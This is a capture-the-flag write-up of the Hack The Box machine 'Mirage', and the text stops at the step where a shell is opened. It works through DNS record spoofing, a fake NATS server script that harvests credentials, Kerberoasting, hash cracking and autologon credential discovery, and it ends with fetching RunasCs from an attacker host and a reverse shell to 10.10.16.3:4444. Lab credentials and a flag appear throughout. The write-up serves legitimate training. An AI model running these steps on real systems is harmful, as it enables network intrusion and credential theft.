Hackthebox: Mirage

Foued SAIDI Lv5
  2025-11-22 20:59:41 2025-11-22 20:59:41 Created   2025-11-22 21:03:46 2025-11-22 21:03:46 Updated    

Overview

Mirage is a hard-difficulty machine from Hack The Box dealing initially with: NFS share leak exposes internal docs → DNS spoofing via nsupdate lets you impersonate a service → Fake NATS server captures Dev_Account_A creds → JetStream log subscription reveals david.jjackson creds → Kerberos LDAP/BloodHound recon maps privilege paths → Weak ACLs (GenericWrite/WriteDACL/AddKeyCredentialLink) → Privilege escalates to high-value domain access.

Mirage-info-card
Mirage-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-23 18:10:01Z)
111/tcp  open  rpcbind?
| rpcinfo: 
|   program version    port/proto  service
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=7/23%OT=53%CT=1%CU=38601%PV=Y%DS=2%DC=T%G=Y%TM=6880C3C
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=I%CI=I%TS=A)SEQ(SP=1
OS:04%GCD=1%ISR=108%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=105%GCD=1%ISR=109%TI=I%
OS:CI=I%II=I%SS=S%TS=A)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=A)SE
OS:Q(SP=108%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=O%TS=A)OPS(O1=M542NW8ST11%O2=M5
OS:42NW8ST11%O3=M542NW8NNT11%O4=M542NW8ST11%O5=M542NW8ST11%O6=M542ST11)WIN(
OS:W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF
OS:%O=M542NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R
OS:=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)
OS:U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%D
OS:FI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-23T18:11:20
|_  start_date: N/A
|_clock-skew: 6h59m59s

We can see a very interesting RPC port exposing multiple methods.

We have rpc ports, we can mount them:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
(base) ┌──(kali㉿kali)-[~]
└─$ showmount -e 10.129.104.218
Export list for 10.129.104.218:
/MirageReports (everyone)

(base) ┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 10.129.104.218:/MirageReports /tmp/nfs
                                                                                                                                                                                                                   
(base) ┌──(kali㉿kali)-[~]
└─$ cd /tmp/nfs
                                                                                                                                                                                                                   
(base) ┌──(kali㉿kali)-[/tmp/nfs]
└─$ ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf  Mirage_Authentication_Hardening_Report.pdf

Reading the DOC, we can see that nats-svc.mirage.htb is missing in DNS and the environment enforces Kerberos. We might be able to abuse DNS updates to redirect that service name to our attacking machine

The default port for nats is 4222.

We need to listen to your 4222 port (the default port of the NATS server) and send an INFO message. Then use nsupdate to add a DNS record pointing to our own machine from the target machine. Wait a few seconds and we will receive a CONNECT message from the target machine.

If we do not send an INFO message to greet the target, we will not be able to receive the CONNECT message sent by the target. nsupdate is only used to trigger the target machine to access your 4222 port:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
(base) ┌──(kali㉿kali)-[/tmp]
└─$ nsupdate         
> server 10.129.104.218
> update add nats-svc.mirage.htb 3600 A 10.10.16.3
> send
> 

(base) ┌──(kali㉿kali)-[/tmp]
└─$ python3 fake_nats.py
[+] Started
[+] Connection from ('10.129.104.218', 56569)
[>] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}


(base) ┌──(kali㉿kali)-[/tmp]
└─$ cat fake_nats.py 
import socket
print("[+] Started")
s = socket.socket()
s.bind(("0.0.0.0", 4222))
s.listen(5)
while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")


    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')
    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode())
    client.close()

Dev_Account_A:hx5h7F5554fP@1337!

We now install and configure natscli to interact using the credentials we captured:

1
2
3
4
5
6
7
8
9
10
11
12
13
(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats context add dev-nats \
  --server nats://dc01.mirage.htb:4222 \
  --user Dev_Account_A \
  --password 'hx5h7F5554fP@1337!' \
  --description "Dev access"
NATS Configuration Context "dev-nats"

  Description: Dev access
  Server URLs: nats://dc01.mirage.htb:4222
     Username: Dev_Account_A
     Password: ******************
         Path: /home/kali/.config/nats/context/dev-nats.json

Then subscribe to all messages
use the jetstream stream management option to to view the only stream:

1
2
3
4
5
6
7
8
9
10
11
12
13
(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats --context dev-nats sub ">" --count 10
07:37:09 Subscribing on > 
[#1] Received on "$JS.API.STREAM.INFO.auth_logs" with reply "_INBOX.NMAzt4nvFdFqsZnhM44z7C.KYtwv5BY"
nil body


[#2] Received on "_INBOX.NMAzt4nvFdFqsZnhM44z7C.KYtwv5BY"
{"type":"io.nats.jetstream.api.v1.stream_info_response","total":0,"offset":0,"limit":0,"config":{"name":"auth_logs","subjects":["logs.auth"],"retention":"limits","max_consumers":-1,"max_msgs":100,"max_bytes":1048576,"max_age":0,"max_msgs_per_subject":-1,"max_msg_size":-1,"discard":"new","storage":"file","num_replicas":1,"duplicate_window":120000000000,"compression":"none","allow_direct":true,"mirror_direct":false,"sealed":false,"deny_delete":true,"deny_purge":true,"allow_rollup_hdrs":false,"consumer_limits":{},"allow_msg_ttl":false,"metadata":{"_nats.level":"1","_nats.req.level":"0","_nats.ver":"2.11.3"}},"created":"2025-05-05T07:18:19.6244845Z","state":{"messages":5,"bytes":570,"first_seq":1,"first_ts":"2025-05-05T07:18:56.6788658Z","last_seq":5,"last_ts":"2025-05-05T07:19:27.2106658Z","num_subjects":1,"consumer_count":0},"cluster":{"leader":"ND4DGBMCTG4RO3T52MUSCLNCS4XNDI26BXXEDYOTUQ56FIOZWP7UZWQM"},"ts":"2025-07-23T18:38:02.1677807Z"}


[#3] Received on "$JS.EVENT.ADVISORY.API"
{"type":"io.nats.jetstream.advisory.v1.api_audit","id":"EsXhuVxO8oVlq8AGrgFeWO","timestamp":"2025-07-23T18:38:02.1677807Z","server":"ND4DGBMCTG4RO3T52MUSCLNCS4XNDI26BXXEDYOTUQ56FIOZWP7UZWQM","client":{"start":"2025-07-23T11:38:02.1672458-07:00","host":"10.129.104.218","id":52,"acc":"dev","user":"Dev_Account_A","name":"NATS CLI Version 0.2.2","lang":"go","ver":"1.41.1","rtt":534900,"server":"ND4DGBMCTG4RO3T52MUSCLNCS4XNDI26BXXEDYOTUQ56FIOZWP7UZWQM","kind":"Client","client_type":"nats"},"subject":"$JS.API.STREAM.INFO.auth_logs","response":"{\"type\":\"io.nats.jetstream.api.v1.stream_info_response\",\"total\":0,\"offset\":0,\"limit\":0,\"config\":{\"name\":\"auth_logs\",\"subjects\":[\"logs.auth\"],\"retention\":\"limits\",\"max_consumers\":-1,\"max_msgs\":100,\"max_bytes\":1048576,\"max_age\":0,\"max_msgs_per_subject\":-1,\"max_msg_size\":-1,\"discard\":\"new\",\"storage\":\"file\",\"num_replicas\":1,\"duplicate_window\":120000000000,\"compression\":\"none\",\"allow_direct\":true,\"mirror_direct\":false,\"sealed\":false,\"deny_delete\":true,\"deny_purge\":true,\"allow_rollup_hdrs\":false,\"consumer_limits\":{},\"allow_msg_ttl\":false,\"metadata\":{\"_nats.level\":\"1\",\"_nats.req.level\":\"0\",\"_nats.ver\":\"2.11.3\"}},\"created\":\"2025-05-05T07:18:19.6244845Z\",\"state\":{\"messages\":5,\"bytes\":570,\"first_seq\":1,\"first_ts\":\"2025-05-05T07:18:56.6788658Z\",\"last_seq\":5,\"last_ts\":\"2025-05-05T07:19:27.2106658Z\",\"num_subjects\":1,\"consumer_count\":0},\"cluster\":{\"leader\":\"ND4DGBMCTG4RO3T52MUSCLNCS4XNDI26BXXEDYOTUQ56FIOZWP7UZWQM\"},\"ts\":\"2025-07-23T18:38:02.1677807Z\"}"}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
nats: error: could not load consumer "audit-reader": consumer not found (10014)
                                                                                                        
(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit     
[dev-nats] ? Start policy (all, new, last, subject, 1h, msg sequence) all
[dev-nats] ? Replay policy instant
[dev-nats] ? Filter Stream by subjects (blank for all) 
[dev-nats] ? Maximum Allowed Deliveries -1
[dev-nats] ? Maximum Acknowledgments Pending 0
[dev-nats] ? Deliver headers only without bodies No
[dev-nats] ? Add a Retry Backoff Policy No
Information for Consumer auth_logs > audit-reader created 2025-07-23 14:39:16

Configuration:

                    Name: audit-reader
               Pull Mode: true
          Deliver Policy: All
              Ack Policy: Explicit
                Ack Wait: 30.00s
           Replay Policy: Instant
         Max Ack Pending: 1,000
       Max Waiting Pulls: 512

State:

            Host Version: 2.11.3
      Required API Level: 0 hosted at level 1
  Last Delivered Message: Consumer sequence: 0 Stream sequence: 0
    Acknowledgment Floor: Consumer sequence: 0 Stream sequence: 0
        Outstanding Acks: 0 out of maximum 1,000
    Redelivered Messages: 0
    Unprocessed Messages: 5
           Waiting Pulls: 0 of maximum 512
                                                                                                        
(base) ┌──(kali㉿kali)-[~/natscli/nats]
└─$ ./nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
[07:39:20] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

Acknowledged message after 184.202072ms delay

[07:39:21] subj: logs.auth / tries: 1 / cons seq: 2 / str seq: 2 / pending: 3

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

Acknowledged message after 2.308247828s delay

[07:39:23] subj: logs.auth / tries: 1 / cons seq: 3 / str seq: 3 / pending: 2

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

david.jjackson:pN8kQmn6b86!1234@

We can now use that to query the LDAP with bloodhound-python:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
(base) ┌──(kali㉿kali)-[~]
└─$ bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -k -d mirage.htb -ns 10.129.104.218 -c All --zip
INFO: Found AD domain: mirage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 12 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.mirage.htb
INFO: Done in 00M 18S
INFO: Compressing output into 20250723144033_bloodhound.zip

We can also bruteforce RIDs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
(base) ┌──(kali㉿kali)-[/tmp]
└─$ nxc smb dc01.mirage.htb -u 'david.jjackson' -p 'pN8kQmn6b86!1234@' -k --rid-brute
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
SMB         dc01.mirage.htb 445    dc01             498: MIRAGE\Enterprise Read-only Domain Controllers (SidTypeGroup)                                                            
SMB         dc01.mirage.htb 445    dc01             500: MIRAGE\Administrator (SidTypeUser)                                                                                       
SMB         dc01.mirage.htb 445    dc01             501: MIRAGE\Guest (SidTypeUser)
SMB         dc01.mirage.htb 445    dc01             502: MIRAGE\krbtgt (SidTypeUser)
SMB         dc01.mirage.htb 445    dc01             512: MIRAGE\Domain Admins (SidTypeGroup)                                                                                      
SMB         dc01.mirage.htb 445    dc01             513: MIRAGE\Domain Users (SidTypeGroup)                                                                                       
SMB         dc01.mirage.htb 445    dc01             514: MIRAGE\Domain Guests (SidTypeGroup)                                                                                      
SMB         dc01.mirage.htb 445    dc01             515: MIRAGE\Domain Computers (SidTypeGroup)                                                                                   
SMB         dc01.mirage.htb 445    dc01             516: MIRAGE\Domain Controllers (SidTypeGroup)                                                                                 
SMB         dc01.mirage.htb 445    dc01             517: MIRAGE\Cert Publishers (SidTypeAlias)                                                                                    
SMB         dc01.mirage.htb 445    dc01             518: MIRAGE\Schema Admins (SidTypeGroup)                                                                                      
SMB         dc01.mirage.htb 445    dc01             519: MIRAGE\Enterprise Admins (SidTypeGroup)                                                                                  
SMB         dc01.mirage.htb 445    dc01             520: MIRAGE\Group Policy Creator Owners (SidTypeGroup)                                                                        
SMB         dc01.mirage.htb 445    dc01             521: MIRAGE\Read-only Domain Controllers (SidTypeGroup)                                                                       
SMB         dc01.mirage.htb 445    dc01             522: MIRAGE\Cloneable Domain Controllers (SidTypeGroup)                                                                       
SMB         dc01.mirage.htb 445    dc01             525: MIRAGE\Protected Users (SidTypeGroup)                                                                                    
SMB         dc01.mirage.htb 445    dc01             526: MIRAGE\Key Admins (SidTypeGroup)
SMB         dc01.mirage.htb 445    dc01             527: MIRAGE\Enterprise Key Admins (SidTypeGroup)                                                                              
SMB         dc01.mirage.htb 445    dc01             553: MIRAGE\RAS and IAS Servers (SidTypeAlias)                                                                                
SMB         dc01.mirage.htb 445    dc01             571: MIRAGE\Allowed RODC Password Replication Group (SidTypeAlias)                                                            
SMB         dc01.mirage.htb 445    dc01             572: MIRAGE\Denied RODC Password Replication Group (SidTypeAlias)                                                             
SMB         dc01.mirage.htb 445    dc01             1000: MIRAGE\DC01$ (SidTypeUser)
SMB         dc01.mirage.htb 445    dc01             1101: MIRAGE\DnsAdmins (SidTypeAlias)
SMB         dc01.mirage.htb 445    dc01             1102: MIRAGE\DnsUpdateProxy (SidTypeGroup)                                                                                    
SMB         dc01.mirage.htb 445    dc01             1103: MIRAGE\Development Team (SidTypeGroup)                                                                                  
SMB         dc01.mirage.htb 445    dc01             1104: MIRAGE\Dev_Account_A (SidTypeUser)                                                                                      
SMB         dc01.mirage.htb 445    dc01             1105: MIRAGE\Dev_Account_B (SidTypeUser)                                                                                      
SMB         dc01.mirage.htb 445    dc01             1106: MIRAGE\IT_Admins (SidTypeGroup)
SMB         dc01.mirage.htb 445    dc01             1107: MIRAGE\david.jjackson (SidTypeUser)                                                                                     
SMB         dc01.mirage.htb 445    dc01             1108: MIRAGE\javier.mmarshall (SidTypeUser)                                                                                   
SMB         dc01.mirage.htb 445    dc01             1109: MIRAGE\mark.bbond (SidTypeUser)
SMB         dc01.mirage.htb 445    dc01             1110: MIRAGE\nathan.aadam (SidTypeUser)                                                                                       
SMB         dc01.mirage.htb 445    dc01             1112: MIRAGE\Mirage-Service$ (SidTypeUser)                                                                                    
SMB         dc01.mirage.htb 445    dc01             2601: MIRAGE\Exchange_Admins (SidTypeGroup)                                                                                   
SMB         dc01.mirage.htb 445    dc01             2602: MIRAGE\IT_Support (SidTypeGroup)                                                                                        
SMB         dc01.mirage.htb 445    dc01             2603: MIRAGE\IT_Contractors (SidTypeGroup)                                                                                    
SMB         dc01.mirage.htb 445    dc01             2604: MIRAGE\svc_mirage (SidTypeUser)

We ill also attempt kerberoasting to get some users hashes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
(base) ┌──(kali㉿kali)-[~]
└─$ impacket-GetUserSPNs 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[-] CCache file is not found. Skipping...
ServicePrincipalName      Name          MemberOf                                                             PasswordLastSet             LastLogon                   Delegation 
------------------------  ------------  -------------------------------------------------------------------  --------------------------  --------------------------  ----------
HTTP/exchange.mirage.htb  nathan.aadam  CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb  2025-06-23 17:18:18.584667  2025-07-04 16:01:43.511763             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$a1830dfc38b31607d378067d21d40a99$a8d5b23d2874eb50ba4a4d2414b21bba411eb7a48d3aafcabc598c823aa945514bea35554a3472adc2d6fae06196b82a3dc42975e60b4e27a06ba66cf7bfccf4ff0ad2140697fa5333e7bf2082acfc6281bd1c84ad19abd6771e07fff3272c8be472b810d792883afc426917f94f23303d335826f90a0f0ce1f0af997114735ff7fb569926a426a7ce6614bad8f4400b9da2038faf86e1af1fc97b4f3674a39788c3ea0a36b727c64f1a685dc156aa108dd4b3f0db0084942f3bd0ada521cd59bf8b50c0e8ffc0b4481fe04b78ef0da126945691f46f7cf4d61351e4fe510aa32229b8679cb26d77f4070b2aedd548a3580040240e28a895653e0a0df9e50bcceed63548ec59d2757df50463977e06e99a3b40320f5e133074432f920ee0b3268d89c6c60667647ae9e0b66928391e5ab3524b048952c42a05591b7c121b65d7c98cf245f054b970f680381086d0e87d081e9ed5d9f471ec07bdb67687b741c05b6744462141bdebd89a483ca086119c7ef63f9320a97942807c552539dde0f3c15ee5dfdbafb662cb074f7378c6188d68980e1c95ef8171a924788c0e9f4245c7b23ee2be370778b5ba795bf19e1cac0a83b972e92bc4386d782a0aae8d5f80ef1d65b9e69d2146dc94b5899a59398d8caeadc96e55b7d296cac500e3dda62b67d3cbd5db6ff3b81a265452403428efd5e142eaafe719492fe11a0f77ba2c4646f53850f54e9773ee8c97b353bbd1592849873d361d99265fed35a9f99289dedbd81f6a31367833b2888107a8d79e0ae07460fe3e4aee279875011cd37586552467cc7677598ad6416c98f594d1818bf13f4be2289584ed6a3cdc6da81ed4162f9b1d826417f9537eff1be2e1822dbd35dea5d5260d05203c4a14ef4b89b0bc335b03a0f5fb3dbdc122a4564a6bed24254482d1d9935d1a24ef5e91a8b8ee9e8b40dd9b86728da59edad56decfbd60aac59ce586f8e18a2bd8080951f970f167117caa80412262a69cc0951e9e43755c3acb0d5444d8fc6e04ae689a0230de0b43b33e94ae3c6ea80ba974ea9c5310a478988bef3f9630321a86dfb4d1273facd2d8de2f8119254d501f1d7ab8f7e1061ec65845da98f048028643894d0751e4a6ed4bd010897396c6f4b588b78b8ae44cc918062dd5d5b39f554dd9f8998f799403e6830a8099395f1f37e07108895ac826fe93e6c87585287f71e8c75985750e286e27ef8ab430c5ab3a66b54987c8cb70bb105b4b9cea96172cc9d242f5f6a5071f56ae3d568acad61b8b767cf387a252231fe2da6a9d3ff36558b05a0f2c09a85ccc584cc704dab32abdfba517300b20210ac7c17b9389c3dc0552cc4c1ef0bdc41372cf93135b35b5de19d4a9eb9b52a3e969d87f78ff0f340ca4d3402079dad2f664acaa190cb56b54b649e7b36b0aa818e2361f0a943f8cf3bb52a5a4154554a344b66d79efb93d2efa8e334f0924698b950ce251fc4df4a3d240f90c896e8f83df665a19d7cc29e8cb0e33456839d02c54af9d1f6973c9840fea1ba7bd8984c65b85595dad85935cfb083559afd8902087efb2f1c

We crack the hash to get the password:

1
2
3
4
5
6
7
8
9
10
11
(base) ┌──(kali㉿kali)-[~]
└─$ john   --wordlist=/usr/share/wordlists/rockyou.txt hash                      
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3edc#EDC3        (?)     
1g 0:00:00:03 DONE (2025-07-23 16:24) 0.2652g/s 3307Kp/s 3307Kc/s 3307KC/s 3er733..3ddfiebw
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We request a ticket with this password and we get the user flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
(base) ┌──(kali㉿kali)-[~]
└─$ impacket-getTGT mirage.htb/nathan.aadam:'3edc#EDC3'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in nathan.aadam.ccache
                                                                                                        
(base) ┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=nathan.aadam.ccache
                                                                                                        
(base) ┌──(kali㉿kali)-[~]
└─$ evil-winrm -i dc01.mirage.htb -r mirage.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                         
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                           
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> cat ../desktop/user.txt
1d0d6aef2bfb146cca9f75ecd9498908
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents>

I used PowerUp.ps1 to check for autologon creds:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> Invoke-AllChecks

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...
Access denied 
At C:\Users\nathan.aadam\Documents\p.ps1:1451 char:21
+     $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service executable and argument permissions...
Access denied 
At C:\Users\nathan.aadam\Documents\p.ps1:1504 char:5
+     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service permissions...
Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At C:\Users\nathan.aadam\Documents\p.ps1:1555 char:5
+     Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeCo ...
+     ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand


[*] Checking %PATH% for potentially hijackable DLL locations...


ModifiablePath    : C:\Users\nathan.aadam\AppData\Local\Microsoft\WindowsApps
IdentityReference : MIRAGE\nathan.aadam
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\nathan.aadam\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\nathan.aadam\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'





[*] Checking for AlwaysInstallElevated registry key...


[*] Checking for Autologon credentials in registry...


DefaultDomainName    : MIRAGE
DefaultUserName      : mark.bbond
DefaultPassword      : 1day@atime
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :





[*] Checking for modifidable registry autoruns and configs...


[*] Checking for modifiable schtask files/configs...


[*] Checking for unattended install files...


[*] Checking for encrypted web.config strings...


[*] Checking for encrypted application pool and virtual directory passwords...


[*] Checking for plaintext passwords in McAfee SiteList.xml files....



[*] Checking for cached Group Policy Preferences .xml files....

mark.bbond:1day@atime

We can also read the configuration file for nats:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
*Evil-WinRM* PS C:\program files\nats-server> cat nats-server.conf
listen: '0.0.0.0:4222'

jetstream: {
  store_dir: 'C:\Program Files\Nats-Server\tmp'
}

accounts: {
  '$SYS': {
    users: [
      { user: 'sysadmin', password: 'bb5M0k5XWIGD' }
    ]
  },

  'dev': {
    jetstream: true,
    users: [
      { user: 'Dev_Account_A', password: 'hx5h7F5554fP@1337!' },
      { user: 'Dev_Account_B', password: 'tvPFGAzdsJfHzbRJ' }
    ]
  }
}
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\nathan.aadam\desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultUsername    REG_SZ    mark.bbond

*Evil-WinRM* PS C:\Users\nathan.aadam\desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    1day@atime

Now get a shell with runascs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> iwr 10.10.16.3/RunasCs.exe -outfile r.exe
*Evil-WinRM* PS C:\Users\nathan.aadam\Documents> ./r.exe mark.bbond 1day@atime powershell.exe -r 10.10.16.3:4444
